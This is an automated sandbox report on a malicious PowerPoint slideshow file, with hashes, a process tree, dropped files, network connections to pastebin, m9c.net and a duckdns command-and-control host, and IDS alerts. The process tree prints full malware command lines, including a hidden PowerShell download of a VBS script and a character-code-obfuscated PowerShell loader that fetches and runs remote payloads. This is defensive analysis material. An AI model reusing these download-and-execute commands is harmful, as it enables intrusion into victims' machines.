File name: | 745db86a63082c422777fb646723ab1d |
Full analysis: | https://app.any.run/tasks/d0d3e481-8ad7-4233-9a8c-6f620e0670df |
Verdict: | Malicious activity |
Analysis date: | July 18, 2019, 03:38:23 |
OS: | Windows 7 Professional Service Pack 1 (build: 7601, 32 bit) |
Indicators: | |
MIME: | application/vnd.ms-powerpoint |
File info: | Composite Document File V2 Document, Little Endian, Os: Windows, Version 10.0, Code page: 1252, Title: Apresentao do PowerPoint, Author: Joselio Bonin, Last Saved By: Joselio Bonin, Revision Number: 5, Name of Creating Application: Microsoft Office PowerPoint, Total Editing Time: 12:18, Create Time/Date: Fri Jul 12 05:39:25 2019, Last Saved Time/Date: Fri Jul 12 05:55:02 2019, Number of Words: 0 |
MD5: | 745DB86A63082C422777FB646723AB1D |
SHA1: | 41864D39E704ADE8F560063B59B368C1031C3C40 |
SHA256: | 232F5AEB67A605446B4876AA000E202AEB2CC6BFEA17D9156A1B18CCAE3A4A00 |
SSDEEP: | 384:QzEIIk/7G6wXpzRprR+HpExvYzCoiCg/:34/7G6GzRprRyOvXoiCg |
.pps/ppt | | | Microsoft PowerPoint document (79.7) |
---|
Title: | Apresentação do PowerPoint |
---|---|
Author: | Joselio Bonin |
LastModifiedBy: | Joselio Bonin |
RevisionNumber: | 5 |
Software: | Microsoft Office PowerPoint |
TotalEditTime: | 12.3 minutes |
CreateDate: | 2019:07:12 04:39:25 |
ModifyDate: | 2019:07:12 04:55:02 |
Words: | - |
ThumbnailClip: | (Binary data 43336 bytes, use -b option to extract) |
CodePage: | Windows Latin 1 (Western European) |
PresentationTarget: | Widescreen |
Bytes: | - |
Paragraphs: | - |
Slides: | 1 |
Notes: | - |
HiddenSlides: | - |
MMClips: | - |
AppVersion: | 16 |
ScaleCrop: | No |
LinksUpToDate: | No |
SharedDoc: | No |
HyperlinksChanged: | No |
TitleOfParts: |
|
HeadingPairs: |
|
PID | CMD | Path | Indicators | Parent process |
---|---|---|---|---|
2864 | "C:\Program Files\Microsoft Office\Office14\POWERPNT.EXE" /s "C:\Users\admin\AppData\Local\Temp\745db86a63082c422777fb646723ab1d.pps" | C:\Program Files\Microsoft Office\Office14\POWERPNT.EXE | — | explorer.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft PowerPoint Exit code: 0 Version: 14.0.6009.1000 | ||||
3172 | "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy bypass -noprofile -windowstyle hidden (New-Object Net.WebClient).DownloadFile('https://pastebin.com/raw/DG0EBdFy','C:\Users\Public\AdobePDF.vbs') | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | POWERPNT.EXE | |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows PowerShell Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255) | ||||
3360 | "C:\Windows\System32\cmd.exe" /c ping 127.0.0.1 -n 10 > nul & start ,C:\Users\Public\AdobePDF.vbs | C:\Windows\System32\cmd.exe | — | POWERPNT.EXE |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Exit code: 0 Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) | ||||
2452 | ping 127.0.0.1 -n 10 | C:\Windows\system32\PING.EXE | — | cmd.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: TCP/IP Ping Command Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255) | ||||
2544 | "C:\Windows\System32\WScript.exe" "C:\Users\Public\AdobePDF.vbs" | C:\Windows\System32\WScript.exe | — | cmd.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft ® Windows Based Script Host Exit code: 0 Version: 5.8.7600.16385 | ||||
2568 | Powershell $Mo=@(91,118,111,105,100,93,32,91,83,121,115,116,101,109,46,82,101,102,108,101,99,116,105,111,110,46,65,115,115,101,109,98,108,121,93,58,58,76,111,97,100,87,105,116,104,80,97,114,116,105,97,108,78,97,109,101,40,39,77,105,99,114,111,115,111,102,116,46,86,105,115,117,97,108,66,97,115,105,99,39,41,59,36,102,106,61,91,77,105,99,114,111,115,111,102,116,46,86,105,115,117,97,108,66,97,115,105,99,46,73,110,116,101,114,97,99,116,105,111,110,93,58,58,67,97,108,108,66,121,110,97,109,101,40,40,78,101,119,45,79,98,106,101,99,116,32,78,101,116,46,87,101,98,67,108,105,101,110,116,41,44,39,68,111,119,110,108,111,97,100,83,116,114,105,110,103,39,44,91,77,105,99,114,111,115,111,102,116,46,86,105,115,117,97,108,66,97,115,105,99,46,67,97,108,108,84,121,112,101,93,58,58,77,101,116,104,111,100,44,39,104,116,116,112,58,47,47,119,119,119,46,109,57,99,46,110,101,116,47,117,112,108,111,97,100,115,47,49,53,54,50,56,54,53,55,50,48,49,46,106,112,103,39,41,124,73,69,88,59,91,66,121,116,101,91,93,93,36,102,61,91,77,105,99,114,111,115,111,102,116,46,86,105,115,117,97,108,66,97,115,105,99,46,73,110,116,101,114,97,99,116,105,111,110,93,58,58,67,97,108,108,66,121,110,97,109,101,40,40,78,101,119,45,79,98,106,101,99,116,32,78,101,116,46,87,101,98,67,108,105,101,110,116,41,44,39,68,111,119,110,108,111,97,100,83,116,114,105,110,103,39,44,91,77,105,99,114,111,115,111,102,116,46,86,105,115,117,97,108,66,97,115,105,99,46,67,97,108,108,84,121,112,101,93,58,58,77,101,116,104,111,100,44,39,104,116,116,112,115,58,47,47,112,97,115,116,101,98,105,110,46,99,111,109,47,114,97,119,47,116,90,50,74,120,71,57,97,39,41,46,114,101,112,108,97,99,101,40,39,64,95,42,39,44,39,48,120,48,39,41,124,73,69,88,59,91,107,46,72,97,99,107,105,116,117,112,93,58,58,101,120,101,40,39,73,110,115,116,97,108,108,85,116,105,108,46,101,120,101,39,44,36,102,41);[System.Text.Encoding]::ASCII.GetString($Mo)|IEX | C:\Windows\System32\WindowsPowerShell\v1.0\Powershell.exe | wmiprvse.exe | |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows PowerShell Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255) | ||||
2844 | cmd /c copy "C:\Users\Public\AdobePDF.vbs" "C:\Users\admin\AppData\Roaming" /Y | C:\Windows\system32\cmd.exe | — | wmiprvse.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Exit code: 0 Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) | ||||
4048 | "{path}" | C:\Windows\Microsoft.NET\Framework\v2.0.50727\InstallUtil.exe | Powershell.exe | |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: .NET Framework installation utility Version: 2.0.50727.5420 (Win7SP1.050727-5400) |
PID | Process | Filename | Type | |
---|---|---|---|---|
2864 | POWERPNT.EXE | C:\Users\admin\AppData\Local\Temp\CVRBA09.tmp.cvr | — | |
MD5:— | SHA256:— | |||
3172 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\K3VTZ5JYPF2CEIZFBNM9.temp | — | |
MD5:— | SHA256:— | |||
2864 | POWERPNT.EXE | C:\Users\admin\AppData\Local\Temp\~DFAC6533C8D3F8FC8A.TMP | — | |
MD5:— | SHA256:— | |||
2568 | Powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\V26A6IYITX4U4ODUIFPJ.temp | — | |
MD5:— | SHA256:— | |||
3172 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms | binary | |
MD5:47388A8B771AD359484FBDBC4C2AF508 | SHA256:710A35A9173421C3A0A348EB1AA0D656CB806F93E2E84C36F60FE2ABE570E7F0 | |||
2844 | cmd.exe | C:\Users\admin\AppData\Roaming\AdobePDF.vbs | text | |
MD5:58E9EFFFC903F66A3CC5263CA9BF905D | SHA256:E073246A727D2F4B2A75E4D5FF1445DAFE703F88CF588203113B8616418DA971 | |||
2568 | Powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RF18072f.TMP | binary | |
MD5:47388A8B771AD359484FBDBC4C2AF508 | SHA256:710A35A9173421C3A0A348EB1AA0D656CB806F93E2E84C36F60FE2ABE570E7F0 | |||
3172 | powershell.exe | C:\Users\Public\AdobePDF.vbs | text | |
MD5:58E9EFFFC903F66A3CC5263CA9BF905D | SHA256:E073246A727D2F4B2A75E4D5FF1445DAFE703F88CF588203113B8616418DA971 | |||
2568 | Powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms | binary | |
MD5:47388A8B771AD359484FBDBC4C2AF508 | SHA256:710A35A9173421C3A0A348EB1AA0D656CB806F93E2E84C36F60FE2ABE570E7F0 | |||
3172 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RF17e0f9.TMP | binary | |
MD5:47388A8B771AD359484FBDBC4C2AF508 | SHA256:710A35A9173421C3A0A348EB1AA0D656CB806F93E2E84C36F60FE2ABE570E7F0 |
PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation |
---|---|---|---|---|---|---|---|---|---|
2568 | Powershell.exe | GET | 200 | 158.69.18.61:80 | http://www.m9c.net/uploads/15628657201.jpg | CA | text | 945 Kb | malicious |
PID | Process | IP | Domain | ASN | CN | Reputation |
---|---|---|---|---|---|---|
2568 | Powershell.exe | 104.20.208.21:443 | pastebin.com | Cloudflare Inc | US | shared |
3172 | powershell.exe | 104.20.208.21:443 | pastebin.com | Cloudflare Inc | US | shared |
2568 | Powershell.exe | 158.69.18.61:80 | www.m9c.net | OVH SAS | CA | malicious |
4048 | InstallUtil.exe | 152.246.81.100:6522 | microsoftoutlook.duckdns.org | TELEFÔNICA BRASIL S.A | BR | malicious |
— | — | 152.246.81.100:6522 | microsoftoutlook.duckdns.org | TELEFÔNICA BRASIL S.A | BR | malicious |
Domain | IP | Reputation |
---|---|---|
pastebin.com |
| shared |
www.m9c.net |
| malicious |
microsoftoutlook.duckdns.org |
| malicious |
PID | Process | Class | Message |
---|---|---|---|
— | — | Misc activity | ET INFO DYNAMIC_DNS Query to *.duckdns. Domain |
— | — | Misc activity | ET INFO DYNAMIC_DNS Query to *.duckdns. Domain |
— | — | Misc activity | ET INFO DYNAMIC_DNS Query to *.duckdns. Domain |
— | — | Misc activity | ET INFO DYNAMIC_DNS Query to *.duckdns. Domain |